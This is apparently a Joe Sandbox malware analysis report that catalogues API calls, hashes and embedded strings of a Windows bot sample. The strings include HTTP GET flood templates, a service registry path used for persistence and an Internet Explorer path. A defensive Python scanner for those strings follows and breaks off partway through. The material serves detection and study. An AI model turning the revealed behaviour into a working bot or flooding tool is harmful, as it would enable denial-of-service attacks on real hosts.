                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1476891362-0
                                                                    • Opcode ID: 97bd7c00ed6bbda089dc2b26730579f3f5ed334adb0da9a8da4e7708ecf6716c
                                                                    • Instruction ID: 885c49e20cdd2e8194fed19f6fbb1843c6ac604a4a77298d6a910c3aa6e159d0
                                                                    • Opcode Fuzzy Hash: 97bd7c00ed6bbda089dc2b26730579f3f5ed334adb0da9a8da4e7708ecf6716c
                                                                    • Instruction Fuzzy Hash: A601AD344117A4DFE725DB64C915BDEBBF4EF017A0F10064DE0A2126EACBB07A05CB61
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E9AF
                                                                    • _mbscat.MSVCRT ref: 0040E9C1
                                                                    • _mbscat.MSVCRT ref: 0040E9D2
                                                                    • _mbscat.MSVCRT ref: 0040E9E3
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040E9F2
                                                                      • Part of subcall function 0040E88C: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E8C1
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8D3
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8E4
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8F5
                                                                      • Part of subcall function 0040E88C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040E914
                                                                      • Part of subcall function 0040E88C: GetFileSize.KERNEL32(00000000,00000000), ref: 0040E925
                                                                      • Part of subcall function 0040E88C: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040E92E
                                                                      • Part of subcall function 0040E88C: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E940
                                                                      • Part of subcall function 0040E88C: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040E960
                                                                      • Part of subcall function 0040E88C: CloseHandle.KERNEL32(?), ref: 0040E96A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscat$File$DirectorySystem$??2@??3@CloseCreateDeleteHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 772766158-0
                                                                    • Opcode ID: f050e5c3edf36beb89aad5587e9d684fb1ab774ce35e067b3901d3a834f974d1
                                                                    • Instruction ID: 8812fba37a6cf724851fda54bdb19bde2bf75586ae27e468a73a39f5530bd05d
                                                                    • Opcode Fuzzy Hash: f050e5c3edf36beb89aad5587e9d684fb1ab774ce35e067b3901d3a834f974d1
                                                                    • Instruction Fuzzy Hash: 230186F5D0425867DF20FB65CD85EC9B7AC5B14314F0408ABE380F3181D7B896E58755
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10005C23
                                                                    • wsprintfA.USER32 ref: 10005C34
                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 10005C42
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: Clore$SYSTEM\Clore
                                                                    • API String ID: 1858923263-3032097531
                                                                    • Opcode ID: c96fd17569b00c9799cf99e387fe8b9af171654239dc34e10faca6164efdcadd
                                                                    • Instruction ID: ef584545b31a73a41dd0c12d4d9e16c99bfa3ea8564b03a7c1ae98d9019e7cca
                                                                    • Opcode Fuzzy Hash: c96fd17569b00c9799cf99e387fe8b9af171654239dc34e10faca6164efdcadd
                                                                    • Instruction Fuzzy Hash: EBF0BBF69001187BEB109764CC05FDA766DAB04744F0005B4B705B5091DA70E6958A58
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?,?,00000000,1000668E,?,?,?), ref: 100037E7
                                                                    • strcpy.MSVCRT(10014F04,?,10014E04,?,?,00000000,1000668E,?,?,?), ref: 100037F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000381C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000381F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003470,00000000,00000000,00000000), ref: 10003835
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThreadstrcpy$CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 4065114739-0
                                                                    • Opcode ID: 6e064e396c2b10128c808703839d6419c5fac0bf89b6e03ced8f04a0ff01337a
                                                                    • Instruction ID: 4ceaf8b7eb5f6f54983e7899383afec7859fd2df3ca1b3d27b4fb4b6cf297609
                                                                    • Opcode Fuzzy Hash: 6e064e396c2b10128c808703839d6419c5fac0bf89b6e03ced8f04a0ff01337a
                                                                    • Instruction Fuzzy Hash: 32F06DF150522CBEF6019BA48CC4CAB7FDCEB4A1E87414469F20492226CB34AC848BB1
                                                                    APIs
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
                                                                    • CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
                                                                    • closesocket.WS2_32(?), ref: 00409EA3
                                                                    • SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1486965892-0
                                                                    • Opcode ID: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction ID: 214bdb797ce9b3806abe695a8f89653cfa2cd86d3a48c32c0ca57aa75e999f02
                                                                    • Opcode Fuzzy Hash: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction Fuzzy Hash: D5F05431110728EFEB209B95CC4EEC677B8FF05354F104518F782915F4D7B1A9449B50
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoad
                                                                    • String ID: \Services\%s
                                                                    • API String ID: 534179979-3692262031
                                                                    • Opcode ID: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction ID: 467d181776a1e2beeecfa0b3b370f3bcece887172159f2bfa2eb347e1e1669ea
                                                                    • Opcode Fuzzy Hash: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction Fuzzy Hash: 6341F671900219BBDF259F94DD84EFEBBB9EF08790F004126FA10E6160DB749D919B64
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(00000000,10013F48,1000C0C4), ref: 00411E8C
                                                                    • _mbscat.MSVCRT ref: 00411E9D
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,00411707,?,?,?,1000C0C4), ref: 00411EBC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Open_mbscat_mbscpy
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 3603629427-3753134293
                                                                    • Opcode ID: 6b02bb4a98b5fffd6b39a6eb6612497dcd227c00fd52fd8f665e7fa4e407ce81
                                                                    • Instruction ID: f404b012dcdcdecafacfe39016de559747c1f6697b09e6aca63dcdb9e67b975b
                                                                    • Opcode Fuzzy Hash: 6b02bb4a98b5fffd6b39a6eb6612497dcd227c00fd52fd8f665e7fa4e407ce81
                                                                    • Instruction Fuzzy Hash: 2BF05E76E0821C7AEB50D6A4CC06FE9776CD714700F1004A5A385F1081EAB4AAD98A11
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040BF5B
                                                                    • strlen.MSVCRT ref: 0040BF75
                                                                    • memcpy.MSVCRT(?,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#), ref: 0040BF80
                                                                    Strings
                                                                    • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 0040BF6B, 0040BF74, 0040BF7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcessmemcpystrlen
                                                                    • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                    • API String ID: 1583653051-4039768343
                                                                    • Opcode ID: 103fc4b8f4a71ce21707e906526d356906a3b5cba268e0895f2aadc7028c4acf
                                                                    • Instruction ID: 9c6fddf69943fceb1b3b240db6a4755dfe01c59e60c080b90881e1fd278b3123
                                                                    • Opcode Fuzzy Hash: 103fc4b8f4a71ce21707e906526d356906a3b5cba268e0895f2aadc7028c4acf
                                                                    • Instruction Fuzzy Hash: FEE0261341479091E311A714D805B8F7BE8EFC1310F05C82DE8C893142D3BC549983B6
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 10003F0F
                                                                    • strlen.MSVCRT ref: 10003F29
                                                                    • memcpy.MSVCRT(?,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#), ref: 10003F34
                                                                    Strings
                                                                    • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10003F1F, 10003F28, 10003F32
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcessmemcpystrlen
                                                                    • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                    • API String ID: 1583653051-4039768343
                                                                    • Opcode ID: da4e982248df773582f56941d9bb260a15c758742642200ffc68563da647e673
                                                                    • Instruction ID: 11f757409b1cd0d19d4aea9d26337259edca0c4abe8b3e42c820718d39602bdf
                                                                    • Opcode Fuzzy Hash: da4e982248df773582f56941d9bb260a15c758742642200ffc68563da647e673
                                                                    • Instruction Fuzzy Hash: 64E0260342479192E311D714D805E8F7BF8EFC2220F05C82DE8CA13546D778648983A2
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000384F
                                                                    • lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe), ref: 10003868
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10003878
                                                                    Strings
                                                                    • \Program Files\Internet Explorer\iexplore.exe, xrefs: 10003862
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DirectorySystemlstrcatlstrcpy
                                                                    • String ID: \Program Files\Internet Explorer\iexplore.exe
                                                                    • API String ID: 2630975639-1907246925
                                                                    • Opcode ID: 8ace842f704627082718ecb96691a6b1b56ec2f04b63d296671ce1c14dbc9da3
                                                                    • Instruction ID: bbe2ddb81922598e9396f6ac1daa09be34c61657f3e4fa9a5e482b7cf1854fd5
                                                                    • Opcode Fuzzy Hash: 8ace842f704627082718ecb96691a6b1b56ec2f04b63d296671ce1c14dbc9da3
                                                                    • Instruction Fuzzy Hash: 94E01AB580422CABEB10ABA0DD8EFC97B7C9B14344F004191E385E5095D6F0A6D8CB91
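                                                                    The function listings above reference a handful of fixed strings: the run-together HTTP request fragments ("GET !@#$%.htm", "GET %$#@!.asp", "GET ^&*().html") handled by the GetCurrentProcessId/strlen/memcpy routines at 0040BF5B and 10003F0F, the "\Services\%s" registry path format used next to RegOpenKeyExA on HKEY_LOCAL_MACHINE (80000002), and the "\Program Files\Internet Explorer\iexplore.exe" path built at 1000384F. The small Python scanner below is an added example and is not part of the Joe Sandbox report or the community Yara rules it cites: it takes those strings verbatim from the report, searches a raw memory dump (for instance one of the .sdmp files listed under Memory Dump Source) for them and reports offsets. The sample buffers are constructed inline, and the match rule (two distinct request fragments plus one of the two paths) is this example's own choice, not a threshold the report states.

                                                                    ```python
"""Scan a raw memory dump for the fixed strings listed in the report.

Added example, not part of the Joe Sandbox report. The byte patterns are
copied from the report's "Strings" / "String ID" entries; the match rule in
verdict() is an assumption of this example, not something the report states.
"""
import re
import sys

# Request fragments the report shows concatenated in the memcpy argument.
HTTP_TEMPLATES = [
    b"GET !@#$%.htm",
    b"GET %$#@!.asp",
    b"GET ^&*().html",
]
# Registry path format seen next to RegOpenKeyExA(HKEY_LOCAL_MACHINE, ...).
SERVICE_KEY_FMT = b"\\Services\\%s"
# Path appended with lstrcatA after GetSystemDirectoryA.
IEXPLORE_PATH = b"\\Program Files\\Internet Explorer\\iexplore.exe"


def find_all(buf: bytes, needle: bytes) -> list:
    """Return every offset of a non-overlapping occurrence of needle in buf."""
    return [m.start() for m in re.finditer(re.escape(needle), buf)]


def scan_dump(buf: bytes) -> dict:
    """Locate each indicator string; returns {name: [offsets]} for those present."""
    hits = {}
    for i, tpl in enumerate(HTTP_TEMPLATES):
        offs = find_all(buf, tpl)
        if offs:
            hits[f"http_template_{i}"] = offs
    for name, needle in (("service_key_fmt", SERVICE_KEY_FMT),
                         ("iexplore_path", IEXPLORE_PATH)):
        offs = find_all(buf, needle)
        if offs:
            hits[name] = offs
    return hits


def verdict(hits: dict) -> bool:
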